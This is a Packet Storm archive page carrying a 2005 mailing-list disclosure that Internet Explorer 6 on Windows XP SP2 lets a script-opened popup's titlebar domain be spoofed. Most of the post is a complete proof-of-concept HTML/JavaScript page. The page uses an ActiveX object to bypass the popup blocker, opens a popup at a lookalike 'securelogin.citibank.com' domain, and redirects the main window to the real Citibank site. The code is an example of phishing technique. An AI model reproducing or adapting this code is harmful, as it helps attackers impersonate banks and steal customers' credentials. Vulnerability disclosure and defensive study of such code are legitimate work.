exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ieBypass.txt

ieBypass.txt
Posted Feb 26, 2005
Authored by bitlance winter

Using magic DNS, the domain name in the Internet Explorer titlebar can be exploited to trick users into visiting a malicious pop-up window. The weakness has been confirmed in version 6.0 on a fully patched system running Windows XP with SP2 installed.

tags | exploit
systems | windows
SHA-256 | f924acc6bb5e37cd8aa464442e76f36b69327f239e6558688048b36fb5c7246c

ieBypass.txt

Change Mirror Download
Hi LIST.

Windows XP SP2 forces the titlebar to be present in script-initiated
Internet Explorer windows.
In the titlebar, domain name is listed before the page title.

Using magic DNS,this domain name can be exploited by malicious people to
trick users into visiting a malicious popup window.
The weakness has been confirmed in version 6.0 on a fully patched system
running Windows XP with SP2 installed.

Example:
- -----8<----- -----8<----- -----8<----- -----8<-----

[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
[!-- saved from url=(0014)about:internet -->
[html lang="x-klingon">
[head>
[title>Welcome to Citibank[/title>
[meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
[meta http-equiv="Content-Script-Type" content="text/javascript">

[script type="text/javascript">
[!-- Begin
function shellscript()
{
window.focus();
pURL = 'https://securelogin.citibank.com"+".e-gold.com/';
sP = 'toolbar=0,scrollbars=0,location=0,statusbar=0,';
sP += 'menubar=0,resizable=0,width=315,';
sP += 'height=200,left = 250,top = 200'
day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(pURL, '" + id + "',sP);");
}

function main()
{
targetURL = 'https://citibank.com/us/index.htm';
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
location.replace(targetURL);
}

setTimeout(' main() ',1000);

// End -->
[/script>

[/head>

[object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="1"
height="1"
align="middle"
>
[param name="ActivateApplets" value="1">
[param name="ActivateActiveXControls" value="1">
[/object>

[/body>
[/html>

- -----8<----- -----8<----- -----8<----- -----8<-----

Reference:
http-equiv (HOW TO BREAK XP SP2 POPUP BLOCKER)
https://www.securityfocus.com/archive/1/384037


REGARDS.

--
bitlance winter

_________________________________________________________________
On the road to retirement? Check out MSN Life Events for advice on how to
get there! https://lifeevents.msn.com/category.aspx?cid=Retirement

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close